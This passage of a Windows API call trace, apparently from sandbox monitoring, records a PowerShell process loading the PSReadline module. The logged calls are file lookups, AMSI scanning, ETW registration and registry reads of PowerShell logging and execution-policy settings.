(in: lpPerformanceCount=0x87fe528 | out: lpPerformanceCount=0x87fe528*=28476504128) returned 1 [0189.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0189.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe45c) returned 1 [0189.732] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x87fe4d8 | out: lpFileInformation=0x87fe4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0189.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe458) returned 1 [0189.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0189.733] AmsiOpenSession () returned 0x0 [0189.733] AmsiScanString () returned 0x80070015 [0190.706] QueryPerformanceCounter (in: lpPerformanceCount=0x87fe4f0 | out: lpPerformanceCount=0x87fe4f0*=28574083101) returned 1 [0190.777] EtwEventRegister (in: ProviderId=0x552abcc, EnableCallback=0x5072dfe, CallbackContext=0x0, RegHandle=0x552aba8 | out: RegHandle=0x552aba8) returned 0x0 [0190.777] EtwEventSetInformation (RegHandle=0x76b9ff0, InformationClass=0x62, EventInformation=0x2, InformationLength=0x552ab6c) returned 0x0 [0190.837] EnumerateTraceGuidsEx () returned 0x0 [0190.838] GetCurrentProcessId () returned 0x1064 [0190.881] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Winevt\\Publishers\\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fd53c | out: phkResult=0x87fd53c*=0x0) returned 0x2 [0191.005] GetCurrentProcessId () returned 0x1064 [0191.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fe47c | out: phkResult=0x87fe47c*=0x0) returned 0x2 [0191.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fe47c | out: phkResult=0x87fe47c*=0x0) returned 0x2 [0191.323] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\en-US\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\en-us\\psreadline.psd1")) returned 0xffffffff [0191.323] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\en\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\en\\psreadline.psd1")) returned 0xffffffff [0191.395] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1")) returned 0x20 [0191.399] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1")) returned 0x20 [0191.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0191.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0191.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0191.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2", nBufferLength=0x3a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2", lpFilePart=0x0) returned 0x39 [0191.544] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Client", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fde1c | out: phkResult=0x87fde1c*=0x754) returned 0x0 [0191.546] RegQueryValueExW (in: hKey=0x754, lpValueName="Install", lpReserved=0x0, lpType=0x87fde30, lpData=0x0, lpcbData=0x87fde2c*=0x0 | out: lpType=0x87fde30*=0x4, lpData=0x0, lpcbData=0x87fde2c*=0x4) returned 0x0 [0191.546] RegQueryValueExW (in: hKey=0x754, lpValueName="Install", lpReserved=0x0, lpType=0x87fde30, lpData=0x87fde1c, lpcbData=0x87fde2c*=0x4 | out: lpType=0x87fde30*=0x4, lpData=0x87fde1c*=0x1, lpcbData=0x87fde2c*=0x4) returned 0x0 [0191.709] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0191.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml", nBufferLength=0x4e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x4d [0191.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fde5c) returned 1 [0191.710] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x87fded8 | out: lpFileInformation=0x87fded8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0191.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fde58) returned 1 [0191.795] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\microsoft.powershell.psreadline.dll")) returned 0x20 [0192.057] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0192.057] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0192.060] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0192.060] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0192.302] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x768bf80*=0x684, lpdwindex=0x87fbbe4 | out: lpdwindex=0x87fbbe4) returned 0x0 [0193.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0193.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0193.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0193.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0194.944] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1")) returned 0x20 [0194.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0194.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0194.945] CoTaskMemAlloc (cb=0x20c) returned 0x7625fa0 [0194.945] GetSystemDirectoryW (in: lpBuffer=0x7625fa0, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0194.945] CoTaskMemFree (pv=0x7625fa0) [0194.945] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0194.945] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0194.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fd9e4) returned 1 [0194.946] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x87fda60 | out: lpFileInformation=0x87fda60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0194.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fd9e0) returned 1 [0194.946] GetSystemInfo (in: lpSystemInfo=0x87fda94 | out: lpSystemInfo=0x87fda94*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0194.946] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fda24 | out: phkResult=0x87fda24*=0x7cc) returned 0x0 [0194.947] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x87fda40, lpData=0x0, lpcbData=0x87fda3c*=0x0 | out: lpType=0x87fda40*=0x0, lpData=0x0, lpcbData=0x87fda3c*=0x0) returned 0x2 [0194.947] RegCloseKey (hKey=0x7cc) returned 0x0 [0194.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0194.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0194.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fda10) returned 1 [0194.948] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0x558f64c | out: lpFileInformation=0x558f64c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1 [0194.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fda0c) returned 1 [0194.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0194.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0194.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fd9d0) returned 1 [0194.949] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0x87fda4c | out: lpFileInformation=0x87fda4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1 [0194.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fd9cc) returned 1 [0194.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0194.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0194.950] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fd994 | out: phkResult=0x87fd994*=0x0) returned 0x2 [0194.951] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fd994 | out: phkResult=0x87fd994*=0x0) returned 0x2 [0194.952] GetEnvironmentVariableW (in: lpName="PSExecutionPolicyPreference", lpBuffer=0x87fd84c, nSize=0xc3 | out: lpBuffer="﫸՘^^") returned 0x0 [0194.953] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fd9d0 | out: phkResult=0x87fd9d0*=0x0) returned 0x2 [0194.954] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fd9d0 | out: phkResult=0x87fd9d0*=0x7cc) returned 0x0 [0194.955] RegQueryValueExW (in: hKey=0x7cc, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x87fd9f0, lpData=0x0, lpcbData=0x87fd9ec*=0x0 | out: lpType=0x87fd9f0*=0x0, lpData=0x0, lpcbData=0x87fd9ec*=0x0) returned 0x2 [0194.955] RegCloseKey (hKey=0x7cc) returned 0x0 [0194.956] CoTaskMemAlloc (cb=0x20c) returned 0x7625fa0 [0194.956] GetSystemDirectoryW (in: lpBuffer=0x7625fa0, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0194.956] CoTaskMemFree (pv=0x7625fa0) [0194.956] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0194.956] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0194.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fd950) returned 1 [0194.956] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x87fd9cc | out: lpFileInformation=0x87fd9cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0194.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fd94c) returned 1 [0194.957] GetSystemInfo (in: lpSystemInfo=0x87fda00 | out: lpSystemInfo=0x87fda00*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0194.957] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fd990 | out: phkResult=0x87fd990*=0x7cc) returned 0x0 [0194.958] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x87fd9ac, lpData=0x0, lpcbData=0x87fd9a8*=0x0 | out: lpType=0x87fd9ac*=0x0, lpData=0x0, lpcbData=0x87fd9a8*=0x0) returned 0x2 [0194.958] RegCloseKey (hKey=0x7cc) returned 0x0 [0194.958] CoTaskMemAlloc (cb=0x94) returned 0x32547d8 [0194.958] IdentifyCodeAuthzLevelW () returned 0x1 [0195.634] CoTaskMemFree (pv=0x32547d8) [0195.634] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0195.634] CloseCodeAuthzLevel () returned 0x1 [0195.736] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x87fda38, dwReserved=0x0 | out: ppSM=0x87fda38*=0x328c1d0) returned 0x0 [0195.737] IUnknown:QueryInterface (in: This=0x328c1d0, riid=0x73ad3e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x87fd4f0 | out: ppvObject=0x87fd4f0*=0x328c1dc) returned 0x0 [0195.737] IUnknown:QueryInterface (in: This=0x328c1dc, riid=0x73b00328*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x87fd4ac | out: ppvObject=0x87fd4ac*=0x0) returned 0x80004002 [0195.737] IUnknown:QueryInterface (in: This=0x328c1dc, riid=0x73b003bc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x87fd2cc | out: ppvObject=0x87fd2cc*=0x0) returned 0x80004002 [0195.737] IUnknown:QueryInterface (in: This=0x328c1d0, riid=0x73b00490*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x87fd0a4 | out: ppvObject=0x87fd0a4*=0x0) returned 0x80004002 [0195.737] IUnknown:AddRef (This=0x328c1dc) returned 0x3 [0195.737] IUnknown:QueryInterface (in: This=0x328c1dc, riid=0x73b00074*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x87fce04 | out: ppvObject=0x87fce04*=0x0) returned 0x80004002 [0195.737] IUnknown:QueryInterface (in: This=0x328c1dc, riid=0x73afffc8*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x87fcdb4 | out: ppvObject=0x87fcdb4*=0x0) returned 0x80004002 [0195.737] IUnknown:QueryInterface (in: This=0x328c1dc, riid=0x73a47604*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x87fcdc0 | out: ppvObject=0x87fcdc0*=0x0) returned 0x80004002 [0195.738] CoGetContextToken (in: pToken=0x87fce20 | out: pToken=0x87fce20) returned 0x0 [0195.738] CObjectContext::QueryInterface () returned 0x0 [0195.738] CObjectContext::GetCurrentApartmentType () returned 0x0 [0195.738] Release () returned 0x0 [0195.738] CoGetObjectContext (in: riid=0x73ad3e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x76cb644 | out: ppv=0x76cb644*=0x320a840) returned 0x0 [0195.739] CoGetContextToken (in: pToken=0x87fd228 | out: pToken=0x87fd228) returned 0x0 [0195.739] IUnknown:QueryInterface (in: This=0x328c1dc, riid=0x73b002b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x87fd2b4 | out: ppvObject=0x87fd2b4*=0x0) returned 0x80004002 [0195.739] IUnknown:Release (This=0x328c1dc) returned 0x2 [0195.739] IUnknown:Release (This=0x328c1d0) returned 0x1 [0195.739] CoGetContextToken (in: pToken=0x87fd890 | out: pToken=0x87fd890) returned 0x0 [0195.741] CoGetContextToken (in: pToken=0x87fd7f0 | out: pToken=0x87fd7f0) returned 0x0 [0195.741] IUnknown:QueryInterface (in: This=0x328c1dc, riid=0x87fd8c0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x87fd8bc | out: ppvObject=0x87fd8bc*=0x328c1d0) returned 0x0 [0195.741] IUnknown:AddRef (This=0x328c1d0) returned 0x3 [0195.741] IUnknown:Release (This=0x328c1d0) returned 0x2 [0195.747] IInternetSecurityManager:MapUrlToZone (in: This=0x328c1d0, pwszUrl="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", pdwZone=0x87fda7c, dwFlags=0x1000 | out: pdwZone=0x87fda7c*=0x0) returned 0x0 [0195.879] CoGetContextToken (in: pToken=0x87fd8f8 | out: pToken=0x87fd8f8) returned 0x0 [0195.879] IUnknown:Release (This=0x328c1dc) returned 0x1 [0195.879] IUnknown:Release (This=0x328c1d0) returned 0x0 [0195.880] IUnknown:Release (This=0x320a840) returned 0x0 [0196.575] EtwEventWriteTransfer (RegHandle=0x31da328, EventDescriptor=0x2e, ActivityId=0x87fed18, RelatedActivityId=0x87fecc8, UserDataCount=0x0, UserData=0x3) returned 0x0 [0196.744] SetEvent (hEvent=0x69c) returned 1 [0196.744] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x87fefcc*=0x6a4, lpdwindex=0x87fedec | out: lpdwindex=0x87fedec) returned 0x0 [0231.792] CoGetContextToken (in: pToken=0x87feb8c | out: 